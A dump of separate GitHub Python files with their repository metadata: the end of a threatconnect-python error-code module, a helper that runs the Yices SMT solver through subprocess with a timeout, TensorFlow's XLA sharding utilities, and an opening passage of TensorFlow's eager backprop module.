e90000 = 'Resource object is not properly formatted. Missing get_id or get_name methods.'
e90001 = 'API returned failed status code.'
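# Editor-added sketch, not part of the original module: each enum value above is
# a format string, so rendering a message is a single str.format call. The
# helper name below is hypothetical.
def _render_error(code, value):
    """Render an ErrorCodes member into a user-facing message."""
    return code.value.format(value)
# Example: _render_error(ErrorCodes.e0130, 'abc')
# -> 'Settings Error: (abc) is an invalid value. API Sleep must be an integer.'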
| {
"content_hash": "a405de18a11117c74f3d45360abdee1f",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 117,
"avg_line_length": 55.82857142857143,
"alnum_prop": 0.6847492323439099,
"repo_name": "percipient/threatconnect-python",
"id": "1de6f25b4f8baa561f7d2bc835d89fae4ae90a3b",
"size": "5862",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "threatconnect/ErrorCodes.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "381902"
}
],
"symlink_target": ""
} |
import os
import subprocess
import shlex
from tempfile import NamedTemporaryFile
import TimeoutThread
def run_command(command, time_out):
args = shlex.split(command)
proc = subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=os.setsid)
with TimeoutThread.processTimeout(time_out, proc.pid):
stdout, stderr = proc.communicate()
resultcode = proc.wait()
return resultcode, stdout, stderr
def try_prog(prog_str):
with NamedTemporaryFile() as tmp_f:
tmp_f.write(prog_str)
tmp_f.flush()
result = run_command("./yices_main %s" % tmp_f.name, 3600000)
        return result[1].find("unsat") == -1, result[1]  # '==', not 'is', for comparing with an int literal
def onerange(n):
return [x+1 for x in range(n)]
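# Editor-added usage sketch, not part of the original module: shows how
# try_prog() is meant to be called. The program text is a hypothetical solver
# input; try_prog() writes it to a temporary file, runs ./yices_main on it under
# run_command()'s timeout and reports satisfiability from the solver's stdout.
def _check_formula_sketch(program_text):
    satisfiable, solver_output = try_prog(program_text)
    return ("SAT" if satisfiable else "UNSAT"), solver_output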
| {
"content_hash": "553c6d67170dfdd8e3c2a49b1a6036de",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 73,
"avg_line_length": 27.607142857142858,
"alnum_prop": 0.6610608020698577,
"repo_name": "Wassasin/automatedreasoning",
"id": "c2d2187809d8457d0df37cdef25c3aafeec07a6a",
"size": "773",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "proj1/src/util/common.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16020"
},
{
"name": "TeX",
"bytes": "45791"
}
],
"symlink_target": ""
} |
"""Experimental support for defining XLA shardings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as _np # Avoids becoming a part of public Tensorflow API.
from tensorflow.compiler.tf2xla.python import xla as tf2xla
from tensorflow.compiler.xla import xla_data_pb2
from tensorflow.core.framework import attr_value_pb2
class Sharding(object):
"""A class to support adding sharding attributes to Ops.
Use the factory constructors and then call apply_to_tensor:
Sharding.replicate().apply_to_tensor(tensor)
"""
def __init__(self, proto=None):
"""Do not use this constructor; use the factory functions below."""
self._proto = proto
@classmethod
def replicate(cls):
"""Returns a replicated sharding attribute.
This causes an op to be computed in its entirety independently on all
cores in the XLA device.
"""
return Sharding(
proto=xla_data_pb2.OpSharding(type=xla_data_pb2.OpSharding.REPLICATED))
@classmethod
def manual(cls):
"""Returns a manuall sharding attribute.
This means the op is manually partitioned by the user and XLA will not
change the shapes.
"""
return Sharding(
proto=xla_data_pb2.OpSharding(type=xla_data_pb2.OpSharding.MANUAL))
@classmethod
def assign_device(cls, core):
"""Returns an AssignDevice sharding attribute.
This causes an op to be computed in its entirety only on one core in
the XLA device.
Args:
core: The core to assign this Op to.
"""
return Sharding(
proto=xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.MAXIMAL,
tile_assignment_dimensions=[1],
tile_assignment_devices=[core]))
@classmethod
def tile(cls, tile_assignment):
"""Returns a Tiled sharding attribute.
This causes an op to be partially computed on multiple cores in the
XLA device.
Args:
tile_assignment: An np.ndarray describing the topology of the tiling and
which device will compute which part of the topology.
Raises:
TypeError: tile_assignment was not of np.array type.
TODO(jmolloy): This concept is nefarious and is not
something we really want to expose to users (especially as the
contract for tile_assignment is very strict).
"""
if not isinstance(tile_assignment, _np.ndarray):
raise TypeError('Tile assignment must be of type np.ndarray')
dims = list(tile_assignment.shape)
flattened_devices = tile_assignment.reshape(-1, order='C')
return Sharding(
proto=xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.OTHER,
tile_assignment_dimensions=dims,
tile_assignment_devices=list(flattened_devices)))
@classmethod
def partial_tile(cls, tile_assignment):
"""Returns a partially tiled sharding attribute.
This is similar to tile(), but tile_assignment has one more dimension than
the tensor, and tiles in the last dimension of tile_assignment are
replicated.
Args:
tile_assignment: An np.ndarray describing the topology of the tiling and
which device will compute which part of the topology.
Raises:
TypeError: tile_assignment was not of np.array type.
"""
if not isinstance(tile_assignment, _np.ndarray):
raise TypeError('PartialTile assignment must be of type np.ndarray')
dims = list(tile_assignment.shape)
flattened_devices = tile_assignment.reshape(-1, order='C')
return Sharding(
proto=xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.OTHER,
tile_assignment_dimensions=dims,
tile_assignment_devices=list(flattened_devices),
replicate_on_last_tile_dim=True))
@classmethod
def split(cls, tensor, split_dimension, num_devices, input_shape=None):
"""Returns a Sharding that splits a tensor across a dimension.
This creates a Tiled attribute, similar to tile(), but easier to use for the
common case of tiling a tensor N ways in one dimension.
Args:
tensor: A tf.Tensor to split.
split_dimension: The dimension number to split.
num_devices: The number of cores to split `tensor` over.
input_shape: The shape of the original tensor.
Raises:
ValueError: The tensor to split was smaller in the split dimension than
the number of devices to split over.
"""
if input_shape:
shape = input_shape
else:
shape = tensor.shape.as_list()
if (shape[split_dimension] is not None and
shape[split_dimension] < num_devices):
raise ValueError('Split dimension was smaller than the required number '
'of splits: shape=%r, dimension=%r, num_devices=%r' %
(shape, split_dimension, num_devices))
tile_assignment_dims = [1] * len(shape)
tile_assignment_dims[split_dimension] = num_devices
return Sharding(
proto=xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.OTHER,
tile_assignment_dimensions=tile_assignment_dims,
tile_assignment_devices=range(num_devices)))
def apply_to_tensor(self,
tensor,
assign_tuple_sharding=False,
use_sharding_op=False):
"""Applies this Sharding attribute to `tensor`.
Args:
tensor: A tf.Tensor to split.
assign_tuple_sharding: If the sharding type should be a tuple.
use_sharding_op: whether to create a sharding op on `tensor`.
Returns:
The tensor with Sharding attribute.
"""
proto = self._proto
if use_sharding_op:
if assign_tuple_sharding:
proto = self._create_tuple_proto(num_outputs=1)
tensor = tf2xla.sharding(tensor, sharding=proto.SerializeToString())
else:
tensor = tf2xla.sharding(
tensor, sharding=proto.SerializeToString())
elif assign_tuple_sharding or len(tensor.op.outputs) > 1:
proto = self._get_or_create_tuple_proto(tensor.op)
# We can't mutate an element of old_proto.tuple_shardings, so create
# a new proto.
tuple_shardings = list(proto.tuple_shardings)
tuple_shardings[tensor.value_index] = self._proto
proto = xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.TUPLE, tuple_shardings=tuple_shardings)
# TODO(jmolloy): This need to be seriously revisited before declaring this
# API available for public use.
# pylint: disable=protected-access
tensor.op._set_attr('_XlaSharding',
attr_value_pb2.AttrValue(s=proto.SerializeToString()))
return tensor
def apply_to_operation(self, operation):
"""Applies this Sharding attribute to `operation`.
Args:
operation: A tf.Operation to add sharding annotation.
"""
attr_value = attr_value_pb2.AttrValue(s=self._proto.SerializeToString())
# pylint: disable=protected-access
operation._set_attr('_XlaSharding', attr_value)
@property
def proto(self):
"""Return the sharding protobuf of type xla_data_pb2.OpSharding."""
return self._proto
def _get_or_create_tuple_proto(self, op):
try:
attr = op.get_attr('_XlaSharding')
proto = xla_data_pb2.OpSharding()
proto.ParseFromString(attr)
return proto
except ValueError:
return self._create_tuple_proto(len(op.outputs))
def _create_tuple_proto(self, num_outputs):
shardings = [
xla_data_pb2.OpSharding(type=xla_data_pb2.OpSharding.REPLICATED)
] * num_outputs
return xla_data_pb2.OpSharding(
type=xla_data_pb2.OpSharding.TUPLE, tuple_shardings=shardings)
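# Editor-added usage sketch, not part of the original module: shows how the
# factory constructors above combine with apply_to_tensor(). `tensor` stands
# for any tf.Tensor built inside an XLA/TPU computation whose first dimension
# holds at least 4 elements.
def _sharding_usage_sketch(tensor):
  # Split the first dimension of `tensor` across 4 cores; the module-level
  # helper split(tensor, 0, 4) defined below is shorthand for the same thing.
  return Sharding.split(tensor, split_dimension=0,
                        num_devices=4).apply_to_tensor(tensor)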
def copy_sharding(from_tensor, to_tensor, use_sharding_op=False):
"""Copies the a tensor's sharding to another.
Args:
from_tensor: Source tensor. Must be the sole output of an op.
    to_tensor: the tensor to annotate with the copy.
use_sharding_op: whether to create a sharding op on `to_tensor`.
Returns:
A tensor with sharding annotation copied from `from_tensor`.
"""
sharding = get_tensor_sharding(from_tensor)
if sharding is None:
return to_tensor
if use_sharding_op:
to_tensor = tf2xla.sharding(to_tensor, sharding=sharding)
attr_value = attr_value_pb2.AttrValue(s=sharding)
# pylint: disable=protected-access
to_tensor.op._set_attr('_XlaSharding', attr_value)
return to_tensor
# Helpers for the above factory functions that allow easy application of
# shardings, for example:
# tensor = xla_sharding.replicate(tensor)
def replicate(tensor, assign_tuple_sharding=False, use_sharding_op=False):
return Sharding.replicate().apply_to_tensor(
tensor,
assign_tuple_sharding=assign_tuple_sharding,
use_sharding_op=use_sharding_op)
def assign_device(tensor,
device,
assign_tuple_sharding=False,
use_sharding_op=False):
"""Returns a tensor that has AssignDevice sharding attribute."""
return Sharding.assign_device(device).apply_to_tensor(
tensor,
assign_tuple_sharding=assign_tuple_sharding,
use_sharding_op=use_sharding_op)
def tile(tensor,
tile_assignment,
assign_tuple_sharding=False,
use_sharding_op=False):
"""Returns a tensor that has tiled sharding.
Args:
tensor: A tf.Tensor to shard.
tile_assignment: An np.ndarray describing the topology of the tiling and
which device will compute which part of the topology.
assign_tuple_sharding: If the sharding type should be a tuple.
use_sharding_op: If true, adds a sharding op to set the sharding.
"""
return Sharding.tile(tile_assignment).apply_to_tensor(
tensor,
assign_tuple_sharding=assign_tuple_sharding,
use_sharding_op=use_sharding_op)
def split(tensor,
split_dimension,
num_devices,
assign_tuple_sharding=False,
use_sharding_op=False,
input_shape=None):
"""Returns a tensor that is split along the given dimension.
Args:
tensor: A tf.Tensor to split.
split_dimension: The dimension to split.
num_devices: The number of devices to partition the dimension.
assign_tuple_sharding: If the sharding type should be a tuple.
use_sharding_op: If true, adds a sharding op to set the sharding.
input_shape: The full shape of the input tensor.
"""
return Sharding.split(tensor, split_dimension, num_devices,
input_shape).apply_to_tensor(
tensor,
assign_tuple_sharding=assign_tuple_sharding,
use_sharding_op=use_sharding_op)
def partial_tile(tensor, tile_assignment, use_sharding_op=False):
"""Returns a tensor that has tiled sharding.
Args:
tensor: A tf.Tensor to shard.
tile_assignment: An np.ndarray describing the topology of the tiling and
which device will compute which part of the topology. It must have one
more dimension than tensor, and the last dimension represents partially
replicated tiles.
use_sharding_op: If true, adds a sharding op to set the sharding.
"""
return Sharding.partial_tile(tile_assignment).apply_to_tensor(
tensor, use_sharding_op=use_sharding_op)
def get_op_sharding(op):
"""Returns sharding attribute of an op.
Args:
op: a TensorFlow op.
Returns:
The attribute representing XLA sharding on this op.
"""
try:
return op.get_attr('_XlaSharding')
except ValueError:
return None
except AttributeError:
# AttributeError: 'DistributedVarOp' object has no attribute 'get_attr'.
return None
def get_tensor_sharding(tensor):
"""Returns sharding attribute of a Tensor.
Args:
tensor: a Tensor.
Returns:
The attribute representing XLA sharding on tensor's op.
"""
try:
return get_op_sharding(tensor.op)
except AttributeError:
# AttributeError: Tensor.op is meaningless when eager execution is enabled.
return None
def get_sharding_tile_shape(sharding):
"""Returns the tile assignment shape for a sharded Tensor.
Args:
sharding: a serialized OpSharding message describing the layout of a
sharded Tensor.
Returns:
A list, for each dimension of the sharded Tensor, of the number of shards
into which it has been split. Returns None if the input indicates no tile
assignments.
"""
if sharding is None:
return None
sharding_message = xla_data_pb2.OpSharding()
sharding_message.ParseFromString(sharding)
if sharding_message.tile_assignment_dimensions:
return sharding_message.tile_assignment_dimensions
else:
return None
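# Editor-added sketch, not part of the original module: round-trips an
# annotation through the helpers above -- split a tensor 4 ways, then read the
# tile assignment shape back off its op.
def _tile_shape_roundtrip_sketch(tensor):
  tensor = split(tensor, split_dimension=0, num_devices=4)
  # For a rank-2 tensor this returns [4, 1].
  return get_sharding_tile_shape(get_tensor_sharding(tensor))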
def auto_to_manual_spmd_partition(tensor, manual_sharding):
"""Switches from automatic SPMD partitioning to manual partitioning.
Converts a full-shaped tensor (to be automatically partitioned by SPMD
partitioner) to a shard-shaped tensor to be consumed by manually partitioned
ops.
Args:
tensor: A tf.Tensor in full shape.
manual_sharding: a serialized string of OpSharding to be used in manual
partitioning.
Returns:
A shard-shaped tensor to be consumed by manually partitioned ops.
"""
return tf2xla.spmd_full_to_shard_shape(
tensor, manual_sharding=manual_sharding)
def manual_to_auto_spmd_partition(tensor, manual_sharding, full_shape):
"""Switches from manual partitioning to automatic SPMD partitioning.
Converts a shard-shaped tensor (manually partitioned in SPMD-style) to a
full-shaped tensor to be partitioned automatically by the SPMD partitioner.
Args:
tensor: A tf.Tensor in shard shape.
manual_sharding: a serialized string of OpSharding to be used in manual
partitioning.
full_shape: the shape of tensor before partitioning.
Returns:
A full-shaped tensor to be partitioned automatically by the SPMD
partitioner.
"""
return tf2xla.spmd_shard_to_full_shape(
tensor, manual_sharding=manual_sharding, full_shape=full_shape)
def mesh_split_sharding(device_mesh, tensor_split_dims_mapping):
"""Returns a Sharding object representing sharding along multiple dimensions.
Args:
device_mesh: An np.ndarray describing the topology of the device mesh and
each element is the ID of the device in the topology.
tensor_split_dims_mapping: A list of integers that map each tensor axis to
the device mesh axis along which it is sharded. Its length is the tensor
rank, and tensor_split_dims_mapping[i] is device mesh axis for tensor
dimension i. Use -1 for tensor dimensions that are not sharded.
Raises:
ValueError: The number of tensor split dimensions is larger than device mesh
rank.
"""
permutation = [d for d in tensor_split_dims_mapping if d >= 0]
if len(permutation) > len(device_mesh.shape):
raise ValueError(
'Number of tensor split dimensions (%r) is larger than device mesh '
'rank (%r). tensor_split_dims_mapping: %r, device_mesh.shape: %r' %
(len(permutation), len(
device_mesh.shape), tensor_split_dims_mapping, device_mesh.shape))
# Append replicated dimensions to the end.
transpose_permutation = permutation + [
d for d in range(len(device_mesh.shape)) if d not in permutation
]
tile_assignment = _np.transpose(device_mesh, transpose_permutation)
tile_shape = [
1 if d < 0 else device_mesh.shape[d] for d in tensor_split_dims_mapping
]
partial = len(permutation) < len(device_mesh.shape)
if partial:
tile_shape.append(_np.prod(device_mesh.shape) // _np.prod(tile_shape))
tile_assignment = _np.reshape(tile_assignment, tile_shape)
if partial:
return Sharding.partial_tile(tile_assignment)
return Sharding.tile(tile_assignment)
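# Editor-added sketch, not part of the original module: illustrates the tile
# assignment mesh_split_sharding() builds. With a 2x4 device mesh and a rank-2
# tensor whose first axis maps to mesh axis 0 and whose second axis is not
# sharded (mapping [0, -1]), the result is a partial tile: 2 shard groups, each
# replicated across 4 devices.
def _mesh_split_sharding_sketch():
  device_mesh = _np.arange(8).reshape((2, 4))
  sharding = mesh_split_sharding(device_mesh, tensor_split_dims_mapping=[0, -1])
  # OpSharding proto with tile_assignment_dimensions [2, 1, 4] and
  # replicate_on_last_tile_dim=True.
  return sharding.proto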
def mesh_split(tensor,
device_mesh,
tensor_split_dims_mapping,
use_sharding_op=False):
"""Returns a tensor that is split along multiple dimensions in a device mesh.
Args:
tensor: A tf.Tensor to split.
device_mesh: An np.ndarray describing the topology of the device mesh and
each element is the ID of the device in the topology.
tensor_split_dims_mapping: A list of integers that map each tensor axis to
the device mesh axis along which it is sharded. Its length is the tensor
rank, and tensor_split_dims_mapping[i] is device mesh axis for tensor
dimension i. Use -1 for tensor dimensions that are not sharded.
use_sharding_op: If true, adds a sharding op to set the sharding.
Raises:
ValueError: The number of tensor split dimensions is larger than device mesh
rank.
"""
sharding = mesh_split_sharding(device_mesh, tensor_split_dims_mapping)
return sharding.apply_to_tensor(tensor, use_sharding_op=use_sharding_op)
| {
"content_hash": "6e003bd0d50272ac4366d7c39a42b61c",
"timestamp": "",
"source": "github",
"line_count": 478,
"max_line_length": 80,
"avg_line_length": 35.13179916317991,
"alnum_prop": 0.6904067170844995,
"repo_name": "petewarden/tensorflow",
"id": "0f1dcd89302dd32de9203e3b299aa191c1b53bdc",
"size": "17442",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tensorflow/compiler/xla/experimental/xla_sharding/xla_sharding.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "31796"
},
{
"name": "Batchfile",
"bytes": "55269"
},
{
"name": "C",
"bytes": "895451"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "82100676"
},
{
"name": "CMake",
"bytes": "6500"
},
{
"name": "Dockerfile",
"bytes": "112853"
},
{
"name": "Go",
"bytes": "1867248"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "984477"
},
{
"name": "Jupyter Notebook",
"bytes": "550862"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1982867"
},
{
"name": "Makefile",
"bytes": "66496"
},
{
"name": "Objective-C",
"bytes": "116558"
},
{
"name": "Objective-C++",
"bytes": "317461"
},
{
"name": "PHP",
"bytes": "4236"
},
{
"name": "Pascal",
"bytes": "318"
},
{
"name": "Pawn",
"bytes": "20422"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "37425809"
},
{
"name": "RobotFramework",
"bytes": "1779"
},
{
"name": "Roff",
"bytes": "2705"
},
{
"name": "Ruby",
"bytes": "7464"
},
{
"name": "SWIG",
"bytes": "8992"
},
{
"name": "Shell",
"bytes": "700106"
},
{
"name": "Smarty",
"bytes": "35725"
},
{
"name": "Starlark",
"bytes": "3613406"
},
{
"name": "Swift",
"bytes": "62814"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
"""Code for backpropagation using the tape utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import operator
import threading
import six
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import execute
from tensorflow.python.eager import imperative_grad
from tensorflow.python.eager import tape
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
_op_attr_type_cache = {}
def op_attr_type(op_type, attr_name):
try:
return _op_attr_type_cache[(op_type, attr_name)]
except KeyError:
with errors.raise_exception_on_not_ok_status() as status:
h = context.context()._handle # pylint: disable=protected-access
attr_type = pywrap_tensorflow.TFE_OpNameGetAttrType(
h, op_type, attr_name, status)
_op_attr_type_cache[(op_type, attr_name)] = attr_type
return attr_type
def make_attr(attr_type, value):
if attr_type == pywrap_tensorflow.TF_ATTR_TYPE:
return dtypes.as_dtype(value)
elif attr_type == [pywrap_tensorflow.TF_ATTR_TYPE]:
return [dtypes.as_dtype(v) for v in value]
elif attr_type == pywrap_tensorflow.TF_ATTR_SHAPE:
return tensor_shape.as_shape(value).as_proto()
elif attr_type == [pywrap_tensorflow.TF_ATTR_SHAPE]:
return [tensor_shape.as_shape(v).as_proto() for v in value]
return value
class _MockOp(object):
"""Pretends to be a tf.Operation for the gradient functions."""
def __init__(self, attrs, inputs, outputs, typ):
self.attrs = attrs
self.inputs = inputs
self.outputs = outputs
self.type = typ
def get_attr(self, attr):
typ = op_attr_type(self.type, attr)
for i in range(0, len(self.attrs), 2):
if self.attrs[i] == attr:
return make_attr(typ, self.attrs[i + 1])
raise KeyError(attr)
def _magic_gradient_function(op_name, attr_tuple, num_inputs,
inputs, outputs, out_grads):
"""Calls the gradient function of the op.
Args:
op_name: the name of the op to be differentiated.
attr_tuple: the attrs, as a tuple.
num_inputs: the number of inputs to the op.
inputs: inputs to the original operation.
outputs: outputs to the original operation.
out_grads: gradients of the operation wrt its outputs.
Returns:
The gradients with respect to the inputs of the function, as a list.
"""
mock_op = _MockOp(attr_tuple, inputs, outputs, op_name)
grad_fn = ops._gradient_registry.lookup(op_name) # pylint: disable=protected-access
if grad_fn is None:
return [None] * num_inputs
return grad_fn(mock_op, *out_grads)
_gradient_functions = {}
_gradient_functions_lock = threading.Lock()
_tracing = False
# TODO(agarwal): use an automatic mechanism for handling None arguments to
# gradient functions.
# Some gradient functions can accept None arguments for gradients. The following
# maps the operation name to the indices at which the corresponding gradient
# function can accept None values.
# e.g. FusedBatchNorm outputs 5 values and hence receives 5 gradient values
# during backprop. However the gradient function uses only the first of those
# values and ignores the rest. The entry, "FusedBatchNorm": [1, 2, 3, 4],
# indicates that only the gradient corresponding to index 0 is used, and the
# gradient values at indices 1-4 are ignored (and hence can be None). The
# backprop algorithm can then leverage this by not constructing zeros to
# pass for those indices.
_grad_fn_accepts_none_for_indices = {
"SoftmaxCrossEntropyWithLogits": [1],
"FusedBatchNorm": [1, 2, 3, 4]
}
def _get_backward_fn(op_name, attrs, num_inputs, op_inputs, op_outputs):
def grad_fn(*orig_outputs):
result = _magic_gradient_function(op_name, attrs, num_inputs,
op_inputs, op_outputs, orig_outputs)
if _tracing:
print("Gradient for", op_name, "inputs", op_inputs, "output_grads",
orig_outputs, "gradients", result)
return nest.flatten(result)
return grad_fn
pywrap_tensorflow.TFE_Py_RegisterBackwardFunctionGetter(_get_backward_fn)
def _record_gradient(op_name, inputs, attrs, results, name):
return pywrap_tensorflow.TFE_Py_RecordGradient(op_name, inputs, attrs,
results, name)
execute.record_gradient = _record_gradient
def implicit_val_and_grad(f):
"""Returns a function which differentiates f with respect to variables.
The wrapped function returns the value and the gradient of f when called with
the same arguments. The gradient is with respect to all TFE variables which
have `variable.watch()` called on them by f.
This function is useful when the exact set of variables to differentiate with
is not known ahead of time.
Example:
```python
dense_layer = tf.layers.Dense(1)
def loss(x, y):
return tf.reduce_sum(tf.square(dense_layer(x) - y))
# Obtain the gradient function.
val_grad_fn = tfe.implicit_value_and_gradients(loss)
# Invoke the gradient function with concrete values of x and y.
x = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
y = tf.constant([[10.0], [20.0]])
value, grads_and_vars = val_grad_fn(x, y)
print('Value of loss: %s' % value)
# Apply the gradients to Variables.
optimizer = tf.train.GradientDescentOptimizer(0.1)
optimizer.apply_gradients(grads_and_vars)
```
Args:
f: function to be differentiated. If `f` returns a scalar, this scalar will
be differentiated. If `f` returns a tensor or list of tensors, by default
a scalar will be computed by adding all their values to produce a single
scalar.
Returns:
A function which, when called, returns a tuple pair.
Its first element is the value to which the function evaluates.
Its second element is list of (gradient, variable) pairs.
Raises:
ValueError: if `f` returns None.
"""
# TODO(cais): Remove calls to tf.constant() once the gradients functions
# accept lists and np.ndarrays.
def grad_fn(*args):
"""Computes the gradient of the wrapped function."""
this_tape = tape.push_new_tape()
try:
end_node = f(*args)
if end_node is None:
raise ValueError("Cannot differentiate a function that returns None; "
"did you forget to return a value from {}?".format(
f.__name__))
finally:
tape.pop_tape(this_tape)
# Sorting variables by id, which is monotonically increasing in construction
# order. This ensures unique order across executions.
# TODO(josh11b): Move the sort to the C++ implementation in pywrap_tfe_src.cc.
variables = list(sorted(this_tape.watched_variables(),
key=lambda v: v.handle._id)) # pylint: disable=protected-access
sources = [x.handle for x in variables]
if not sources:
raise ValueError("No trainable variables were accessed while the "
"function was being computed.")
grad = imperative_grad.imperative_grad(_default_vspace,
this_tape,
nest.flatten(end_node),
sources)
return end_node, list(zip(grad, variables))
return grad_fn
def implicit_grad(f):
"""Returns a function which differentiates f with respect to variables.
The wrapped function returns the gradient of f when called with the same
arguments. The gradient is with respect to all TFE variables which have
`variable.watch()` called on them by f.
This function is useful when the exact set of variables to differentiate with
is not known ahead of time.
Example:
```python
dense_layer = tf.layers.Dense(1)
def loss(x, y):
return tf.reduce_sum(tf.square(dense_layer(x) - y))
# Obtain the gradient function.
grad_fn = tfe.implicit_gradients(loss)
# Invoke the gradient function with concrete values of x and y.
x = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
y = tf.constant([[10.0], [20.0]])
grads_and_vars = grad_fn(x, y)
# Apply the gradients to Variables.
optimizer = tf.train.GradientDescentOptimizer(0.1)
optimizer.apply_gradients(grads_and_vars)
```
Args:
f: function to be differentiated. If `f` returns a scalar, this scalar will
be differentiated. If `f` returns a tensor or list of tensors, by default
a scalar will be computed by adding all their values to produce a single
scalar.
Returns:
A function which, when called, returns a list of (gradient, variable) pairs.
"""
# TODO(cais): Remove calls to tf.constant() once the gradients functions
# accept lists and np.ndarrays.
def grad_fn(*args, **kwds):
"""Computes the gradient of the wrapped function."""
return implicit_val_and_grad(f)(*args, **kwds)[1]
return grad_fn
def _get_arg_spec(f, params, param_args):
"""The positions of the parameters of f to be differentiated in param_args."""
try:
args = tf_inspect.getargspec(f).args
except TypeError as e:
# TypeError can happen when f is a callable object.
if params is None:
return range(len(param_args))
elif all(isinstance(x, int) for x in params):
return params
raise ValueError("Either callable provided is not a function or could not "
"inspect its arguments by name: %s. Original error: %s"
% (f, e))
if params is None:
if not args:
return range(len(param_args))
return range(len(args))
elif all(isinstance(x, six.string_types) for x in params):
return [args.index(n) for n in params]
elif all(isinstance(x, int) for x in params):
return params
else:
raise ValueError(
"params must be all strings or all integers; got %s." % params)
def gradients_function(f, params=None):
"""Returns a function which differentiates f with respect to params.
Example:
```python
# f(x, y) = (x ^ 3) * y - x * (y ^ 2)
# Therefore, the 1st order derivatives are:
# df / dx = 3 * (x ^ 2) * y - y ^ 2
# df / dy = x ^ 3 - 2 * x * y
# The 2nd order derivatives with respect to x is:
# d^2 f / (dx)^2 = 6 * x * y
def f(x, y):
return x * x * x * y - x * y * y
# Obtain a function that returns 1st order gradients.
grad_fn = tfe.gradients_function(f)
x = 2.0
y = 3.0
# Invoke the 1st order gradient function.
x_grad, y_grad = grad_fn(x, y)
assert x_grad.numpy() == 3 * (2 ** 2) * 3 - 3 ** 2
assert y_grad.numpy() == (2 ** 3) - 2 * 2 * 3
# Obtain a function that returns the 2nd order gradient with respect to x.
gradgrad_fn = tfe.gradients_function(lambda x, y: grad_fn(x, y)[0])
# Invoke the 2nd order gradient function.
x_gradgrad = gradgrad_fn(x, y)[0]
assert x_gradgrad.numpy() == 6 * 2 * 3
# To obtain a callable that returns the gradient(s) of `f` with respect to a
# subset of its inputs, use the `params` keyword argument with
# `gradients_function()`.
ygrad_fn = tfe.gradients_function(f, params=[1])
(y_grad,) = ygrad_fn(x, y)
assert y_grad.numpy() == (2 ** 3) - 2 * 2 * 3
```
Args:
f: function to be differentiated. If `f` returns a scalar, this scalar will
be differentiated. If `f` returns a tensor or list of tensors, by default
a scalar will be computed by adding all their values to produce a single
scalar. If desired, the tensors can be elementwise multiplied by the
tensors passed as the `dy` keyword argument to the returned gradient
function.
params: list of parameter names of f or list of integers indexing the
parameters with respect to which we'll differentiate. Passing None
differentiates with respect to all parameters.
Returns:
function which, when called, returns the value of f and the gradient
of f with respect to all of `params`. The function takes an extra optional
keyword argument "dy". Setting it allows computation of vector jacobian
products for vectors other than the vector of ones.
Raises:
ValueError: if the params are not all strings or all integers.
"""
def decorated(*args, **kwds):
"""Computes the gradient of the decorated function."""
_, grad = val_and_grad_function(f, params=params)(*args, **kwds)
return grad
return decorated
def _ensure_unique_tensor_objects(parameter_positions, args):
"""Make each of the parameter_positions in args a unique ops.Tensor object.
Ensure that each parameter is treated independently.
For example:
def f(x, y): return x * y
g = gradients_function(f)
one = tf.constant(1.)
g(one, one) should return [1., 1.]
(even though the two arguments are the same Tensor object).
Args:
parameter_positions: List of indices into args defining the arguments to
differentiate against.
args: A list of arguments to the function to be differentiated.
Returns:
args, possibly edited in-place.
"""
s = set()
for (i, t) in enumerate(args):
if i in parameter_positions:
tid = ops.tensor_id(t)
if tid in s:
args[i] = gen_array_ops.identity(args[i])
else:
s.add(tid)
return args
def val_and_grad_function(f, params=None):
"""Returns a function that computes f and its derivative w.r.t. params.
Example:
```python
# f(x, y) = (x ^ 3) * y - x * (y ^ 2)
# Therefore, the 1st order derivatives are:
# df / dx = 3 * (x ^ 2) * y - y ^ 2
# df / dy = x ^ 3 - 2 * x * y
def f(x, y):
return x * x * x * y - x * y * y
# Obtain a function that returns the function value and the 1st order
# gradients.
val_grads_fn = tfe.value_and_gradients_function(f)
x = 2.0
y = 3.0
# Invoke the value-and-gradients function.
f_val, (x_grad, y_grad) = val_grads_fn(x, y)
assert f_val.numpy() == (2 ** 3) * 3 - 2 * (3 ** 2)
assert x_grad.numpy() == 3 * (2 ** 2) * 3 - 3 ** 2
assert y_grad.numpy() == (2 ** 3) - 2 * 2 * 3
# To obtain a callable that returns the value of `f` and the gradient(s) of
# `f` with respect to a subset of its inputs, use the `params` keyword
# argument with `value_and_gradients_function()`.
val_ygrad_fn = tfe.value_and_gradients_function(f, params=[1])
f_val, (y_grad,) = val_ygrad_fn(x, y)
assert f_val.numpy() == (2 ** 3) * 3 - 2 * (3 ** 2)
assert y_grad.numpy() == (2 ** 3) - 2 * 2 * 3
```
Args:
